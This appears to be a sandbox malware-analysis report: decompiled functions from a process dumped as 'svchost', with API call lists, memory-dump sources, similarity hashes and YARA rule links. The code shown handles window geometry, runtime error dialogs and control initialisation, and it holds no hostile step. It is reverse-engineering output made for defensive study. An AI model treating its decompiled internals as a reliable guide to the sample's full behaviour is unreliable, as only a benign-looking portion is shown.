    0x004210b1
    0x004210b1
    0x004210c5
    0x004210c9
    0x004210cf
    0x004210d5
    0x004210d9
    0x004210df
    0x004210e3
    0x004210e3
    0x004210d1
    0x004210d1
    0x004210d1
    0x004210e5
    0x004210f1
    0x004210f3
    0x004210fd
    0x00421107
    0x0042110b
    0x0042111a
    0x0042111c
    0x00421120
    0x00421126
    0x00421134
    0x00421134
    0x00421136
    0x0042113a
    0x00421140
    0x0042114c
    0x0042114c
    0x0042114e
    0x00421152
    0x00421158
    0x00421166
    0x00421166
    0x00421168
    0x0042116c
    0x00421172
    0x0042117e
    0x0042117e
    0x0042118b
    0x004211b0
    0x004211b0
    0x004211bc

    APIs
    • GetWindowRect.USER32(?,?), ref: 00420FED
    • GetWindowRect.USER32(?,?), ref: 00420FFC
    • IntersectRect.USER32(?,?,?), ref: 00421055
    • EqualRect.USER32(?,?), ref: 00421085
    • GetWindowRect.USER32(?,?), ref: 004210A3
    • OffsetRect.USER32(?,?,?), ref: 0042111A
    • OffsetRect.USER32(?,?,00000000), ref: 00421134
    • OffsetRect.USER32(?,?,00000000), ref: 0042114C
    • OffsetRect.USER32(?,00000000,?), ref: 00421166
    • OffsetRect.USER32(?,00000000,?), ref: 0042117E
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Rect$Offset$Window$EqualIntersect
    • String ID:
    • API String ID: 2638238157-0
    • Opcode ID: b5059615557ef41e567cc05585b1659c6724358664900b4b97c9f024eb2b96d7
    • Instruction ID: 39f88f8f80d00238e6b95b454080b553bb4d445c19e9b8ea437eb5a3b31021ec
    • Opcode Fuzzy Hash: b5059615557ef41e567cc05585b1659c6724358664900b4b97c9f024eb2b96d7
    • Instruction Fuzzy Hash: 12512A75608342AFC308CF28D98096FBBE9ABD8744F404A2EF985D3354DA74ED45CB92
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004385C0 Relevance: 15.1, APIs: 10, Instructions: 86COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E004385C0(void* __ecx) {
				struct tagRECT _v16;
				int _v20;
				intOrPtr _v24;
				void* __ebp;
				int _t23;
				int _t24;
				int _t25;
				signed int _t39;
				int _t41;
				int _t42;
				int _t43;
				void* _t56;
				signed int _t61;

				_t56 = __ecx;
				_t61 = GetSystemMetrics(0x2e);
				_t39 = GetSystemMetrics(0x2d);
				_t23 = GetSystemMetrics(0xa);
				_t41 = _t39 + _t39 * 4;
				if(_t23 <= _t41) {
					_v20 = _t41;
				} else {
					_v20 = GetSystemMetrics(0xa);
				}
				_t24 = GetSystemMetrics(9);
				_t42 = _t61 + _t61 * 4;
				if(_t24 <= _t42) {
					_t25 = _t42;
				} else {
					_t25 = GetSystemMetrics(9);
				}
				_t43 = _v20;
				_v20 = _t43;
				if(_t43 <= _t25) {
					_v20 = _t25;
				}
				GetWindowRect( *(_t56 + 0x1c),  &_v16);
				if(E00484C84(_t61, GetParent( *(_t56 + 0x1c))) != 0) {
					E00489A84(_t29,  &_v16);
				}
				GetWindowRect( *(_t56 + 0x1c),  &_v16);
				E00489A84(_t56,  &_v16);
				return SetRect(_t56 + 0x50, _v16.top - _v24 - _t39, _t61 + _v16.left, _v16.top - _t39, _v16.right - _t61);
			}
















    0x004385cd
    0x004385d5
    0x004385db
    0x004385dd
    0x004385df
    0x004385e4
    0x004385f0
    0x004385e6
    0x004385ea
    0x004385ea
    0x004385f6
    0x004385f8
    0x004385fe
    0x00438606
    0x00438600
    0x00438602
    0x00438602
    0x00438608
    0x0043860e
    0x00438612
    0x00438614
    0x00438614
    0x00438627
    0x0043863b
    0x00438644
    0x00438644
    0x00438652
    0x0043865b
    0x00438691

    APIs
    • GetSystemMetrics.USER32(0000002E), ref: 004385D1
    • GetSystemMetrics.USER32(0000002D), ref: 004385D7
    • GetSystemMetrics.USER32(0000000A), ref: 004385DD
    • GetSystemMetrics.USER32(0000000A), ref: 004385E8
    • GetSystemMetrics.USER32(00000009), ref: 004385F6
    • GetSystemMetrics.USER32(00000009), ref: 00438602
    • GetWindowRect.USER32(?,?), ref: 00438627
    • GetParent.USER32(?), ref: 0043862D
    • GetWindowRect.USER32(?,00000000), ref: 00438652
    • SetRect.USER32(?,?,00000000,?,?), ref: 00438684
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: MetricsSystem$Rect$Window$Parent
    • String ID:
    • API String ID: 3457858938-0
    • Opcode ID: b87edf11274884cb9e5bbe53bbd641921e0142f545444fdd4bd3ccc6a9b87188
    • Instruction ID: f7a7af18747ca5311e642bf31800b03f59eb2646073d63be27b53c3deea8a244
    • Opcode Fuzzy Hash: b87edf11274884cb9e5bbe53bbd641921e0142f545444fdd4bd3ccc6a9b87188
    • Instruction Fuzzy Hash: 3F21A3B1A443066FD704DF68DD4593FB7A8EBC8700F00492EB905D3281EBB4ED098BA6
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00474EA7 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 100fileCOMMONLIBRARYCODE
    Download Yara Rule
    C-Code - Quality: 96%
    			E00474EA7(void* __edi, long _a4) {
				char _v164;
				char _v424;
				int _t17;
				long _t19;
				signed int _t42;
				long _t47;
				void* _t48;
				signed int _t54;
				void** _t56;
				void* _t57;

				_t48 = __edi;
				_t47 = _a4;
				_t42 = 0;
				_t17 = 0x4b9968;
				while(_t47 !=  *_t17) {
					_t17 = _t17 + 8;
					_t42 = _t42 + 1;
					if(_t17 < 0x4b99f8) {
						continue;
					}
					break;
				}
				_t54 = _t42 << 3;
				_t2 = _t54 + 0x4b9968; // 0xa4000000
				if(_t47 ==  *_t2) {
					_t17 =  *0x4e1778; // 0x0
					if(_t17 == 1 || _t17 == 0 &&  *0x4b91f4 == 1) {
						_t16 = _t54 + 0x4b996c; // 0x49dba4
						_t56 = _t16;
						_t19 = E00473450( *_t56);
						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t56, _t19,  &_a4, 0);
					} else {
						if(_t47 != 0xfc) {
							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
								E00477840( &_v424, "<program name unknown>");
							}
							_push(_t48);
							_t49 =  &_v424;
							if(E00473450( &_v424) + 1 > 0x3c) {
								_t49 = E00473450( &_v424) +  &_v424 - 0x3b;
								E004714B0(E00473450( &_v424) +  &_v424 - 0x3b, "...", 3);
								_t57 = _t57 + 0x10;
							}
							E00477840( &_v164, "Runtime Error!\n\nProgram: ");
							E00477850( &_v164, _t49);
							E00477850( &_v164, "\n\n");
							_t12 = _t54 + 0x4b996c; // 0x49dba4
							E00477850( &_v164,  *_t12);
							_t17 = E0047C902( &_v164, "Microsoft Visual C++ Runtime Library", 0x12010);
						}
					}
				}
				return _t17;
			}













    0x00474ea7
    0x00474eb0
    0x00474eb3
    0x00474eb5
    0x00474eba
    0x00474ebe
    0x00474ec1
    0x00474ec7
    0x00000000
    0x00000000
    0x00000000
    0x00474ec7
    0x00474ecc
    0x00474ecf
    0x00474ed5
    0x00474edb
    0x00474ee3
    0x00474fd4
    0x00474fd4
    0x00474fdf
    0x00474ff1
    0x00474efa
    0x00474f00
    0x00474f1c
    0x00474f2a
    0x00474f30
    0x00474f37
    0x00474f39
    0x00474f49
    0x00474f64
    0x00474f6c
    0x00474f71
    0x00474f71
    0x00474f80
    0x00474f8d
    0x00474f9e
    0x00474fa3
    0x00474fb0
    0x00474fc6
    0x00474fce
    0x00474f00
    0x00474ee3
    0x00474ff9

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 00474F14
    • GetStdHandle.KERNEL32(000000F4,0049DBA4,00000000,?,00000000,?), ref: 00474FEA
    • WriteFile.KERNEL32(00000000), ref: 00474FF1
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: File$HandleModuleNameWrite
    • String ID: #TG$...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
    • API String ID: 3784150691-3961000474
    • Opcode ID: 30dfc0f02f68c4f8f43f7053faf01fc5dfcaab5816e232e9a751187024a2c1a2
    • Instruction ID: 427fb8dc755007a937ad8220d2362343b5f7c9a607f97e75cc55c323c529deb4
    • Opcode Fuzzy Hash: 30dfc0f02f68c4f8f43f7053faf01fc5dfcaab5816e232e9a751187024a2c1a2
    • Instruction Fuzzy Hash: 5D31F972A002086FDF20EB60CD49FEA776CEB85304F50807BF558E6141E7B8D980CA59
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0047C902 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMONLIBRARYCODE
    Download Yara Rule
    C-Code - Quality: 46%
    			E0047C902(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr* _t4;
				intOrPtr* _t7;
				_Unknown_base(*)()* _t11;
				void* _t14;
				struct HINSTANCE__* _t15;
				void* _t17;

				_t14 = 0;
				_t17 =  *0x4e1ac4 - _t14; // 0x0
				if(_t17 != 0) {
					L4:
					_t4 =  *0x4e1ac8; // 0x0
					if(_t4 != 0) {
						_t14 =  *_t4();
						if(_t14 != 0) {
							_t7 =  *0x4e1acc; // 0x0
							if(_t7 != 0) {
								_t14 =  *_t7(_t14);
							}
						}
					}
					return  *0x4e1ac4(_t14, _a4, _a8, _a12);
				}
				_t15 = LoadLibraryA("user32.dll");
				if(_t15 == 0) {
					L10:
					return 0;
				}
				_t11 = GetProcAddress(_t15, "MessageBoxA");
				 *0x4e1ac4 = _t11;
				if(_t11 == 0) {
					goto L10;
				} else {
					 *0x4e1ac8 = GetProcAddress(_t15, "GetActiveWindow");
					 *0x4e1acc = GetProcAddress(_t15, "GetLastActivePopup");
					goto L4;
				}
			}









    0x0047c903
    0x0047c905
    0x0047c90d
    0x0047c951
    0x0047c951
    0x0047c958
    0x0047c95c
    0x0047c960
    0x0047c962
    0x0047c969
    0x0047c96e
    0x0047c96e
    0x0047c969
    0x0047c960
    0x00000000
    0x0047c97d
    0x0047c91a
    0x0047c91e
    0x0047c987
    0x00000000
    0x0047c987
    0x0047c92c
    0x0047c930
    0x0047c935
    0x00000000
    0x0047c937
    0x0047c945
    0x0047c94c
    0x00000000
    0x0047c94c

    APIs
    • LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,00474FCB,?,Microsoft Visual C++ Runtime Library,00012010,?,0049DBA4,?,0049DBF4,?,?,?,Runtime Error!Program: ), ref: 0047C914
    • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0047C92C
    • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0047C93D
    • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0047C94A
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: AddressProc$LibraryLoad
    • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
    • API String ID: 2238633743-4044615076
    • Opcode ID: f218762c8d1058e1420daa76b58b8b5f2180d44cded82771e82e7976566f0777
    • Instruction ID: 0136df4196457bb8bd6c51fde2089160d29575766b3ed94f02237bca75df0ab6
    • Opcode Fuzzy Hash: f218762c8d1058e1420daa76b58b8b5f2180d44cded82771e82e7976566f0777
    • Instruction Fuzzy Hash: 0C0175B1241281AB8B508FB69CC0AA77FDCA78574070844BFF604D2671D678C8418B5D
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0048705A Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42libraryloaderCOMMON
    Download Yara Rule
    C-Code - Quality: 40%
    			E0048705A(signed short _a4, signed int _a8) {
				struct HINSTANCE__* _t6;
				_Unknown_base(*)()* _t7;
				struct HINSTANCE__* _t15;
				struct HINSTANCE__* _t16;
				CHAR* _t18;
				signed short _t19;

				_t18 = "COMCTL32.DLL";
				_t16 = GetModuleHandleA(_t18);
				_t6 = LoadLibraryA(_t18);
				_t15 = _t6;
				if(_t15 == 0) {
					return _t6;
				} else {
					_t19 = 0;
					_t7 = GetProcAddress(_t15, "InitCommonControlsEx");
					if(_t7 != 0) {
						_push(_a4);
						if( *_t7() != 0) {
							_t19 = _a4;
							if(_t16 == 0) {
								 *0x492020();
								_t19 = _t19 | 0x00003fc0;
							}
						}
					} else {
						if((_a8 & 0x00003fc0) == _a8) {
							 *0x492020();
							_t19 = 0x3fc0;
						}
					}
					FreeLibrary(_t15);
					return _t19;
				}
			}









    0x0048705c
    0x0048706a
    0x0048706c
    0x00487072
    0x00487076
    0x004870ce
    0x00487078
    0x0048707e
    0x00487080
    0x00487088
    0x004870a5
    0x004870ad
    0x004870af
    0x004870b5
    0x004870b7
    0x004870bd
    0x004870bd
    0x004870b5
    0x0048708a
    0x00487099
    0x0048709b
    0x004870a1
    0x004870a1
    0x00487099
    0x004870c3
    0x00000000
    0x004870c9

    APIs
    • GetModuleHandleA.KERNEL32(COMCTL32.DLL,00000800,00000000,00000400,00487354,?,00020000), ref: 00487063
    • LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 0048706C
    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00487080
    • 741EE7F0.COMCTL32 ref: 0048709B
    • 741EE7F0.COMCTL32 ref: 004870B7
    • FreeLibrary.KERNEL32(00000000), ref: 004870C3
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Library$AddressFreeHandleLoadModuleProc
    • String ID: COMCTL32.DLL$InitCommonControlsEx
    • API String ID: 1437655972-4218389149
    • Opcode ID: 08bebc01a5467ae87b7c4e5ff4c631784e3df4bec415ab95759d2b72d8b1801b
    • Instruction ID: b624006b0eee7f1f73bc5abda9b7c268f8512eeab002cc325d322060f01fcc7e
    • Opcode Fuzzy Hash: 08bebc01a5467ae87b7c4e5ff4c631784e3df4bec415ab95759d2b72d8b1801b
    • Instruction Fuzzy Hash: 8AF0A432706612678621AB74AD5891F7AADBBE57517250837F940E3210DB68DC01876E
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0041D090 Relevance: 13.9, APIs: 9, Instructions: 387windowCOMMON
    Download Yara Rule
    C-Code - Quality: 97%
    			E0041D090(intOrPtr __ecx) {
				int _t136;
				struct HWND__* _t141;
				void* _t142;
				intOrPtr* _t143;
				void* _t144;
				signed int _t149;
				signed int _t156;
				signed int _t169;
				intOrPtr* _t170;
				signed int _t174;
				intOrPtr* _t177;
				void* _t178;
				signed int _t180;
				signed int _t182;
				int _t183;
				void* _t184;
				struct HWND__* _t186;
				intOrPtr* _t187;
				unsigned int _t190;
				signed int _t191;
				struct HWND__* _t198;
				signed int _t203;
				signed int _t205;
				struct HWND__* _t206;
				signed int _t207;
				signed char _t208;
				signed int _t209;
				intOrPtr* _t251;
				struct HWND__* _t270;
				unsigned int _t274;
				void* _t276;
				void* _t277;
				intOrPtr _t280;
				int _t282;
				void* _t283;
				signed int _t286;
				signed int _t288;
				void* _t289;
				void* _t290;
				signed int _t292;
				int _t295;
				intOrPtr _t296;
				intOrPtr* _t297;
				int _t298;
				void* _t299;

				_push(0xffffffff);
				_push(E0048E9C8);
				_t136 =  *[fs:0x0];
				_push(_t136);
				 *[fs:0x0] = _t298;
				_t299 = _t298 - 0x88;
				_t270 =  *(_t299 + 0xa4);
				_t280 = __ecx;
				 *((intOrPtr*)(_t299 + 0x28)) = __ecx;
				if(_t270 == 0) {
					L58:
					 *[fs:0x0] =  *(_t299 + 0x94);
					return _t136;
				}
				_t136 = IsChild( *(__ecx + 0x1c), _t270);
				_t303 = _t136;
				if(_t136 == 0) {
					goto L58;
				}
				_t136 = E00413AB0(E00418A40(0x3e9, 0, 0), _t303,  *((intOrPtr*)(_t280 + 0xdc)), _t299 + 0xc, 0);
				if(_t136 == 0) {
					goto L58;
				}
				_t136 = E00414340( *((intOrPtr*)(_t299 + 0xc)), _t270, 1);
				_t295 = _t136;
				 *(_t299 + 0x20) = _t295;
				if(_t295 == 0xffffffff) {
					goto L58;
				}
				_t9 =  *((intOrPtr*)(_t299 + 0xc)) + 0x14; // 0x14
				_t136 = E00418A40(0x3ea,  *((intOrPtr*)(E004135B0(_t9, _t295, 0))), 0);
				_t282 = _t136;
				if(_t282 == 0) {
					goto L58;
				}
				asm("sbb ebx, ebx");
				_t203 =  ~( ~( *(_t282 + 0x14) & 0x00006000));
				 *(_t299 + 0x24) = _t203;
				_t141 = GetParent(_t270);
				_t13 =  *((intOrPtr*)(_t299 + 0x10)) + 0x14; // 0x14
				 *(_t299 + 0x30) = _t141;
				_t142 = E004135B0(_t13, _t295, 0);
				if(( *(_t282 + 0x14) & 0x00000040) == 0) {
					__eflags =  *((intOrPtr*)(_t299 + 0x10)) + 0x14;
					_t143 = E0041D5E0( *((intOrPtr*)(_t299 + 0x10)) + 0x14,  *((intOrPtr*)(_t299 + 0x10)) + 0x14, _t142);
					_t21 =  *_t143 + 4; // 0x4
					_t283 = _t143 + _t21;
					_t144 = E0040C020( *((intOrPtr*)(_t299 + 0x10)) + 0x14, _t283);
					_t299 = _t299 + 4;
					 *((intOrPtr*)(_t299 + 0x1c)) =  *((intOrPtr*)(_t144 + _t283 + 8));
				} else {
					 *((intOrPtr*)(_t299 + 0x1c)) = 0;
				}
				E0040B5D0(_t299 + 0x30);
				 *(_t299 + 0x30) = 0x496394;
				 *((intOrPtr*)(_t299 + 0xa0)) = 0;
				E0040B5D0(_t299 + 0x58);
				 *(_t299 + 0x58) = 0x496394;
				 *((char*)(_t299 + 0xa0)) = 1;
				E0040B5D0(_t299 + 0x44);
				 *(_t299 + 0x44) = 0x496394;
				 *((char*)(_t299 + 0xa0)) = 2;
				_t286 =  *((intOrPtr*)( *((intOrPtr*)(_t299 + 0x10)) + 0x18)) - 1;
				 *(_t299 + 0x18) = _t286;
				if(_t286 <= 0) {
					L31:
					_t149 =  *(_t299 + 0x54);
					_t274 = _t149 >> 2;
					if(_t274 <= 0) {
						L57:
						 *((char*)(_t299 + 0xa0)) = 1;
						 *(_t299 + 0x44) = 0x4962b0;
						E0040B7D0(_t299 + 0x44);
						 *((char*)(_t299 + 0xa0)) = 0;
						 *(_t299 + 0x58) = 0x4962b0;
						E0040B7D0(_t299 + 0x58);
						 *((intOrPtr*)(_t299 + 0xa0)) = 0xffffffff;
						 *(_t299 + 0x30) = 0x4962b0;
						_t136 = E0040B7D0(_t299 + 0x30);
						goto L58;
					}
					if(_t203 != 1) {
						asm("sbb eax, eax");
						_t205 =  ~_t149 &  *(_t299 + 0x4c);
						_t288 = E0040BF30(_t205, _t274, _t295);
						_t299 = _t299 + 0xc;
						__eflags = _t288 - 0xffffffff;
						if(_t288 != 0xffffffff) {
							L45:
							__eflags =  *((intOrPtr*)(_t299 + 0xac)) - 1;
							if( *((intOrPtr*)(_t299 + 0xac)) != 1) {
								_t288 = _t288 - 1;
								__eflags = _t288;
								if(_t288 >= 0) {
									L51:
									__eflags = _t288 - 0xffffffff;
									if(_t288 == 0xffffffff) {
										goto L57;
									}
									L52:
									_t296 =  *((intOrPtr*)( *((intOrPtr*)(_t299 + 0x60)) + _t288 * 4));
									_t206 =  *(_t296 + 0x1c);
									__eflags = _t206 -  *((intOrPtr*)(_t299 + 0xa8));
									if(_t206 !=  *((intOrPtr*)(_t299 + 0xa8))) {
										__eflags =  *(_t299 + 0xb0) - 1;
										if( *(_t299 + 0xb0) == 1) {
											E00414500( *((intOrPtr*)(_t299 + 0x10)), GetParent(_t206));
											SendMessageA( *(_t296 + 0x1c), 0xf1, 1, 0);
											 *((intOrPtr*)(_t299 + 0x70)) = E00413600( *((intOrPtr*)(_t299 + 0x10)) + 0x14,  *((intOrPtr*)( *(_t299 + 0x4c) + _t288 * 4)));
											__eflags = 0;
											 *((intOrPtr*)(_t299 + 0x78)) =  *((intOrPtr*)( *((intOrPtr*)(_t299 + 0x2c)) + 0xdc));
											 *((intOrPtr*)(_t299 + 0x80)) = 0;
											 *((intOrPtr*)(_t299 + 0x84)) = 0;
											 *((intOrPtr*)(_t299 + 0x9c)) = 0;
											 *((intOrPtr*)(_t299 + 0xa0)) = 0;
											E00418A40(0x7d8, _t299 + 0x6c, 0);
										}
										_t156 = IsWindow(_t206);
										__eflags = _t156;
										if(_t156 != 0) {
											E0048768A(_t296);
										}
									}
									goto L57;
								}
								L50:
								_t288 = _t274 - 1;
								goto L51;
							}
							__eflags =  *((intOrPtr*)(_t205 + _t288 * 4)) - _t295;
							if( *((intOrPtr*)(_t205 + _t288 * 4)) != _t295) {
								goto L51;
							}
							_t288 = _t288 + 1;
							__eflags = _t288 - _t274;
							if(_t288 != _t274) {
								goto L51;
							}
							_t288 = 0;
							goto L52;
						}
						_t288 = E0041FC10(_t154, _t205, _t274, _t295);
						_t299 = _t299 + 0xc;
						__eflags = _t288 - 0xffffffff;
						if(_t288 == 0xffffffff) {
							__eflags =  *((intOrPtr*)(_t299 + 0xac)) - 1;
							if( *((intOrPtr*)(_t299 + 0xac)) != 1) {
								goto L50;
							}
							_t288 = 0;
							goto L52;
						}
						goto L45;
					}
					asm("sbb eax, eax");
					_t169 =  ~( *(_t299 + 0x40)) &  *(_t299 + 0x38);
					if( *((intOrPtr*)(_t299 + 0xac)) != _t203) {
						_t288 = _t274 - 1;
						__eflags = _t288;
						if(_t288 < 0) {
							goto L57;
						}
						_t170 = _t169 + _t288 * 4;
						while(1) {
							__eflags =  *_t170 -  *((intOrPtr*)(_t299 + 0x1c));
							if( *_t170 <  *((intOrPtr*)(_t299 + 0x1c))) {
								goto L51;
							}
							_t288 = _t288 - 1;
							_t170 = _t170 - 4;
							__eflags = _t288;
							if(_t288 >= 0) {
								continue;
							}
							goto L57;
						}
						goto L51;
					}
					_t288 = 0;
					if(_t274 <= 0) {
						goto L57;
					}
					while( *_t169 <  *((intOrPtr*)(_t299 + 0x1c))) {
						_t288 = _t288 + 1;
						_t169 = _t169 + 4;
						if(_t288 < _t274) {
							continue;
						}
						goto L57;
					}
					goto L51;
				} else {
					do {
						_t38 =  *((intOrPtr*)(_t299 + 0x10)) + 0x14; // 0x14
						_t297 = E004135B0(_t38, _t286, 0);
						_t40 =  *((intOrPtr*)(_t299 + 0x10)) + 0x14; // 0x14
						if(E00413C90(_t40, _t286) != 1) {
							_t174 = E00418A40(0x3ea,  *_t297, 0);
							_t42 = _t297 + 0x18; // 0x18
							_t289 = _t42;
							_t207 = _t174;
							_t290 = _t289 + E0040C020( *_t297, _t289);
							_t292 =  *(_t290 + E0040C020( *_t297, _t290));
							_t177 = E0041D5E0( *(_t299 + 0x18) + 0x14, __eflags, _t297);
							_t46 =  *_t177 + 4; // 0x4
							_t276 = _t177 + _t46;
							_t178 = E0040C020( *_t177, _t276);
							_t299 = _t299 + 0xc;
							__eflags = _t207;
							 *(_t299 + 0x14) =  *(_t178 + _t276 + 4);
							if(_t207 == 0) {
								L28:
								_t203 =  *(_t299 + 0x20);
								_t180 =  *(_t299 + 0x18) - 1;
								__eflags = _t180;
								 *(_t299 + 0x18) = _t180;
								_t286 = _t180;
								goto L29;
							}
							__eflags = _t292;
							if(_t292 == 0) {
								goto L28;
							}
							_t182 = IsWindow( *(_t292 + 0x1c));
							__eflags = _t182;
							if(_t182 == 0) {
								goto L28;
							}
							_t183 = IsWindowVisible( *(_t292 + 0x1c));
